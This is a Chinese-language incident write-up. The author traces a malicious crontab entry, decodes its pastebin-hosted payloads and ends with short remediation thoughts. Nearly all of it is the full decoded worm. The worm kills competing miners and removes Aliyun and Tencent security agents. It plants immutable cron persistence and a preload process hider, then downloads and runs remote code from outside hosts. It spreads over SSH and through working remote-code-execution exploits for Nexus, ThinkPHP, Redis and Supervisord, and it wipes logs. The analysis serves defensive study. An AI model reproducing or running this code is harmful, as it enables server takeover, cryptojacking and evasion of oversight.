crontab可疑行
*/23 * * * * (curl -fsSL https://pastebin.com/raw/qbbSdzZd||wget -q -O- https://pastebin.com/raw/qbbSdzZd)|sh
> wget https://pastebin.com/raw/qbbSdzZd && cat qbbSdzZd
(curl -fsSL https://pastebin.com/raw/T8zYizW2 || wget -q -O- https://pastebin.com/raw/T8zYizW2)|base64 -d |/bin/bash
> wget https://pastebin.com/raw/T8zYizW2 | base64 -d
#!/bin/bash
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
function b() {
pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg
rm -rf /tmp/qW3xT.2 /tmp/ddgs.3020 /tmp/ddgs.3020 /tmp/wnTKYg /tmp/2t3ik
ps auxf|grep -v grep|grep "xmr" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xig" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "ddgs" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "qW3xT" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "t00ls.ru" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "sustes" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "Xbash" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "cranbery" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "minerd" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "wnTKYg" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "thisxxs" | awk '{print $2}' | xargs kill -9
ps auxf|grep -v grep|grep "hashfish" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep /opt/yilu/mservice|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep /usr/bin/.sshd|awk '{print $2}'|xargs kill -9
ps auxf | grep -v grep | grep hwlh3wlh44lh | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /usr/bin/.sshd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /usr/bin/bsd-port | awk '{print $2}' | xargs kill -9
p=$(ps auxf|grep -v grep|grep sysinfo|wc -l)
if [ ${p} -eq 0 ];then
ps auxf|grep -v grep | awk '{if($3>=80.0) print $2}'| xargs kill -9
fi
}
function d() {
ARCH=$(uname -i)
if [ "$ARCH" == "x86_64" ]; then
mkdir -p /tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy
chmod 1777 /tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy
(curl -fsSL --connect-timeout 120 http://alonecode.ml/linux/sysinfo -o /tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy/sysinfo \
|| wget http://alonecode.ml/linux/sysinfo -O /tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy/sysinfo) \
&& chmod +x /tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy/sysinfo
nohup /tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy/sysinfo >/dev/null 2>1 &
else
mkdir -p /var/tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy
chmod 1777 /var/tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy
(curl -fsSL --connect-timeout 120 http://alonecode.ml/linux/sysinfo -o /var/tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy/sysinfo \
|| wget http://alonecode.ml/linux/sysinfo -O /var/tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy/sysinfo) \
&& chmod +x /var/tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy/sysinfo
nohup /var/tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy/sysinfo >/dev/null 2>1 &
fi
}
function e() {
nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3hUV3B5MmcxJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))" >/dev/null 2>&1 &
touch /tmp/.38t9guft0055d0565u444gtjr0
}
function c() {
chattr -i /usr/local/bin/dns /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/ld.so.preload
(curl -fsSL --connect-timeout 120 https://pastebin.com/raw/cBjiacdv -o /usr/local/bin/dns \
|| wget https://pastebin.com/raw/cBjiacdv -O /usr/local/bin/dns) \
&& chmod 755 /usr/local/bin/dns \
&& touch -acmr /bin/sh /usr/local/bin/dns && chattr +i /usr/local/bin/dns
echo -e "SHELL=/bin/sh\nPATH=/sbin:/bin:/usr/sbin:/usr/bin\nMAILTO=root\nHOME=/\n# run-parts\n01 * * * * root run-parts /etc/cron.hourly\n02 4 * * * root run-parts /etc/cron.daily\n0 1 * * * root /usr/local/bin/dns" > /etc/crontab && touch -acmr /bin/sh /etc/crontab
echo -e "*/10 * * * * root (curl -fsSL https://pastebin.com/raw/qbbSdzZd||wget -q -O- https://pastebin.com/raw/qbbSdzZd)|sh\n##" > /etc/cron.d/root && touch -acmr /bin/sh /etc/cron.d/root && chattr +i /etc/cron.d/root
echo -e "*/17 * * * * root (curl -fsSL https://pastebin.com/raw/qbbSdzZd||wget -q -O- https://pastebin.com/raw/qbbSdzZd)|sh\n##" > /etc/cron.d/apache && touch -acmr /bin/sh /etc/cron.d/apache && chattr +i /etc/cron.d/apache
echo -e "*/23 * * * * (curl -fsSL https://pastebin.com/raw/qbbSdzZd||wget -q -O- https://pastebin.com/raw/qbbSdzZd)|sh\n##" > /var/spool/cron/root && touch -acmr /bin/sh /var/spool/cron/root && chattr +i /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo -e "*/31 * * * * (curl -fsSL https://pastebin.com/raw/qbbSdzZd||wget -q -O- https://pastebin.com/raw/qbbSdzZd)|sh\n##" > /var/spool/cron/crontabs/root && touch -acmr /bin/sh /var/spool/cron/crontabs/root && chattr +i /var/spool/cron/crontabs/root
mkdir -p /etc/cron.hourly
(curl -fsSL --connect-timeout 120 https://pastebin.com/raw/qbbSdzZd -o /etc/cron.hourly/oanacroner||wget https://pastebin.com/raw/qbbSdzZd -O /etc/cron.hourly/oanacroner) && chmod 755 /etc/cron.hourly/oanacroner
mkdir -p /etc/cron.daily
(curl -fsSL --connect-timeout 120 https://pastebin.com/raw/qbbSdzZd -o /etc/cron.daily/oanacroner||wget https://pastebin.com/raw/qbbSdzZd -O /etc/cron.daily/oanacroner) && chmod 755 /etc/cron.daily/oanacroner
mkdir -p /etc/cron.monthly
(curl -fsSL --connect-timeout 120 https://pastebin.com/raw/qbbSdzZd -o /etc/cron.monthly/oanacroner||wget https://pastebin.com/raw/qbbSdzZd -O /etc/cron.monthly/oanacroner) && chmod 755 /etc/cron.monthly/oanacroner
mkdir -p /usr/local/lib/
if [ ! -f "/usr/local/lib/libdns.so" ]; then
curl -fsSL --connect-timeout 120 http://alonecode.ml/libprocesshider.so -o /usr/local/lib/libdns.so && chmod 755 /usr/local/lib/libdns.so && touch -acmr /bin/sh /usr/local/lib/libdns.so && chattr +i /usr/local/lib/libdns.so
if [ ! -f "/usr/local/lib/libdns.so" ]; then
wget http://alonecode.ml/libprocesshider.so -O /usr/local/lib/libdns.so \
&& chmod 755 /usr/local/lib/libdns.so \
&& touch -acmr /bin/sh /usr/local/lib/libdns.so \
&& chattr +i /usr/local/lib/libdns.so
fi
fi
echo /usr/local/lib/libdns.so > /etc/ld.so.preload
touch -acmr /bin/sh /etc/ld.so.preload
touch -acmr /bin/sh /usr/local/lib/libdns.so
chattr -i /etc/ld.so.preload && echo /usr/local/lib/libdns.so > /etc/ld.so.preload && touch -acmr /bin/sh /etc/ld.so.preload
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"" /root/.ssh/known_hosts); do
ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h \
'(curl -fsSL https://pastebin.com/raw/qbbSdzZd || wget -q -O- https://pastebin.com/raw/qbbSdzZd)|sh' &
done
fi
touch -acmr /bin/sh /etc/cron.hourly/oanacroner
touch -acmr /bin/sh /etc/cron.daily/oanacroner
touch -acmr /bin/sh /etc/cron.monthly/oanacroner
}
function a() {
if ps aux | grep -i '[a]liyun'; then
wget http://update.aegis.aliyun.com/download/uninstall.sh
chmod +x uninstall.sh
./uninstall.sh
wget http://update.aegis.aliyun.com/download/quartz_uninstall.sh
chmod +x quartz_uninstall.sh
./quartz_uninstall.sh
rm -f uninstall.sh quartz_uninstall.sh
pkill aliyun-service
rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
rm -rf /usr/local/aegis*;
elif ps aux | grep -i '[y]unjing'; then
/usr/local/qcloud/stargate/admin/uninstall.sh
/usr/local/qcloud/YunJing/uninst.sh
/usr/local/qcloud/monitor/barad/admin/uninstall.sh
fi
touch /tmp/.a
}
mkdir -p /tmp
chmod 1777 /tmp
if [ ! -f "/tmp/.a" ]; then
a
fi
b
c
port=$(netstat -an | grep :3333 | wc -l)
if [ ${port} -eq 0 ];then
d
fi
if [ ! -f "/tmp/.38t9guft0055d0565u444gtjr0" ]; then
e
fi
echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cron
将上述代码的e函数拿出来
python -c import base64;
exec(
base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3hUV3B5MmcxJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz')
)
解码
import urllib
import base64
d= 'https://pastebin.com/raw/xTWpy2g1'
try:
page=base64.b64decode(urllib.urlopen(d).read())
exec(page)
except:
pass
再解码
import requests
import threading
import time
import socket
from xmlrpclib import ServerProxy
from re import findall
import os
import json
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
from bs4 import BeautifulSoup
Number = 0
ThreadNumberGo = 0
Victor = 0
a3 = 0
a4 = 0
A = 0
NexusLDNumber = 0
NexusVNumber = 0
ThinkphpLDNumber = 0
ThinkphpVNumber = 0
RedisLDNumber = 0
RedisVNumber = 0
SupervisordLDNumber = 0
SupervisordVNumber = 0
class Thread (threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
def run(self):
global a3
IP_list(a3)
def IP_list(a3):
global ThreadNumberGo
global ip
ThreadNumberGo += 1
ip2 = os.popen("/sbin/ifconfig -a|grep inet|grep -v 127.0.0.1|grep -v inet6|awk '{print $2}'|tr -d \"addr:\"").readline().rstrip()
ips2 = findall(r'\d+.\d+.', ip2)[0]
for i in range(0, 255):
ip_list2 = (ips2 + (str(i)))
for g in range(1, 255):
ip = ip_list2 + '.' + (str(g))
try:
Nexus(ip)
except:
try:
Thinkphp(ip)
except:
try:
Redis(ip)
except:
try:
Supervisord(ip,"9000")
except:
try:
Supervisord(ip,"9001")
except:
try:
Supervisord(ip,"9002")
except:
try:
Supervisord(ip,"9003")
except:
try:
Supervisord(ip,"8090")
except:
try:
Supervisord(ip,"7001")
except:
try:
Supervisord(ip,"9999")
except:
try:
Supervisord(ip,"80")
except:
try:
Supervisord(ip,"9100")
except:
pass
ThreadNumberGo -= 1
def Nexus(IP):
url = "http://{0}:8081/".format(IP)
html = requests.get(url,timeout=5)
html = html.text
if html.find("Nexus Repository Manager") > 0:
if html.find("/static/rapture/resources/favicon.ico?_v=") > 0:
if int(html[html.find("/static/rapture/resources/favicon.ico?_v=") + len("/static/rapture/resources/favicon.ico?_v=3."):html.find(".",html.find("/static/rapture/resources/favicon.ico?_v=") + len("/static/rapture/resources/favicon.ico?_v=3."))]) < 15:
def Attack(ip,port,Command):
AccUrl = "http://{0}:{1}".format(ip,port) + "/service/extdirect"
data = {"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":50,"sort":[{"property":"name","direction":"ASC"}],"filter":
[{"property":"repositoryName","value":"*"},{"property":"expression","value":"233.class.forName('java.lang.Runtime').getRuntime().exec('{0}')".format(Command)},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":8}
headers = {
"Host":"{0}:{1}".format(ip,port),
"User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101",
"Accept":"*/*",
"Content-Type":"application/json",
"X-Requested-With":"XMLHttpRequest",
"Content-Length":"368",
"Connection":"close"
}
requests.post(AccUrl,data=json.dumps(data),headers=headers,timeout=10)
Attack(IP,"8081","curl -fsSL https://pastebin.com/raw/b5p2r6DQ -o /tmp/sh-thd-1555254163650")
time.sleep(5)
Attack(IP,"8081","chmod +x /tmp/sh-thd-1555254163650")
time.sleep(3)
Attack(IP,"8081","/bin/bash /tmp/sh-thd-1555254163650")
def Thinkphp(IP):
global ip
try:
url = "http://{0}".format(IP)
response = requests.get(url=url + r"/public/index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1",timeout=5)
except:
try:
url = "http://{0}".format(IP)
response = requests.get(url=url + r"/index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1",timeout=5)
except:
try:
url = "https://{0}".format(IP)
response = requests.get(url=url + r"/public/index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1",timeout=5)
except:
url = "https://{0}".format(IP)
response = requests.get(url=url + r"/index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1",timeout=5)
soup = BeautifulSoup(response.text,"lxml")
if 'PHP Version' in str(soup.text):
def Attack(Url,Command):
url = Url
try:
requests.get(url=url + r"/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]={0}".format(Command),timeout=5)
except:
try:
requests.get(url=url + r"/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]={0}".format(Command),timeout=5)
except:
pass
try:
Attack(url,"(curl -fsSL https://pastebin.com/raw/b5p2r6DQ||wget -q -O- https://pastebin.com/raw/b5p2r6DQ)|bash")
except:
pass
class Redis():
def __init__(self,host):
self.host = host
def run(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(2)
s.connect((self.host, 6379))
s.send("info\r\n")
if s.recv(1) == '$':
s.send('config set dir /var/spool/cron\r\n')
time.sleep(1)
s.send('config set dbfilename root\r\n')
time.sleep(1)
s.send('set ACbackup "\\n\\n\\n*/1 * * * * curl -fsSL https://pastebin.com/raw/b5p2r6DQ|bash\\n\\n\\n"\r\n')
time.sleep(1)
s.send('save\r\n')
s.close()
def Supervisord(IP,Port):
def AttackPOC(IP,Port):
target = "http://{0}:{1}/RPC2".format(IP,Port)
socket.setdefaulttimeout(25)
try:
server = ServerProxy(target)
server.supervisor.supervisord.options.warnings.linecache.os.system('curl -fsSL https://pastebin.com/raw/b5p2r6DQ -o /tmp/sh-thd-1555254163650')
time.sleep(1)
server.supervisor.supervisord.options.warnings.linecache.os.system('wget https://pastebin.com/raw/b5p2r6DQ -O /tmp/sh-thd-1555254163650')
time.sleep(1)
server.supervisor.supervisord.options.warnings.linecache.os.system('chmod +x /tmp/sh-thd-1555254163650')
time.sleep(1)
server.supervisor.supervisord.options.warnings.linecache.os.system('/bin/bash /tmp/sh-thd-1555254163650')
except:
pass
AttackPOC(IP,Port)
thread = locals()
ThreadNumber = os.popen("grep 'processor' /proc/cpuinfo | sort -u | wc -l")
ThreadNumber = ThreadNumber.read()
K = 0
LThreadNumber = 0
while LThreadNumber < 255:
if a3 < 255:
if ThreadNumberGo < int(ThreadNumber):
LThreadNumber += 1
for ZS in range(LThreadNumber,LThreadNumber+1):
thread[str(K)] = Thread()
(thread[str(K)]).start()
a3 += 1
K += 1
else:
if open("/tmp/.38t9guft0055d0565u444gtjr0"):
os.remove("/tmp/.38t9guft0055d0565u444gtjr0")
break
思考
- 可以看出来病毒的代码非常的丑陋,但是也非常暴力和高效
- 可能出现漏洞的软件:Nenux, Thinkphp, redis, supervisord。所以要检查这些软件是不是没有设置密码什么的
- 如果已经感染病毒,查看局域网的其他机器是否都免密了,是否也感染了病毒
- 可以从病毒上面学习一些知识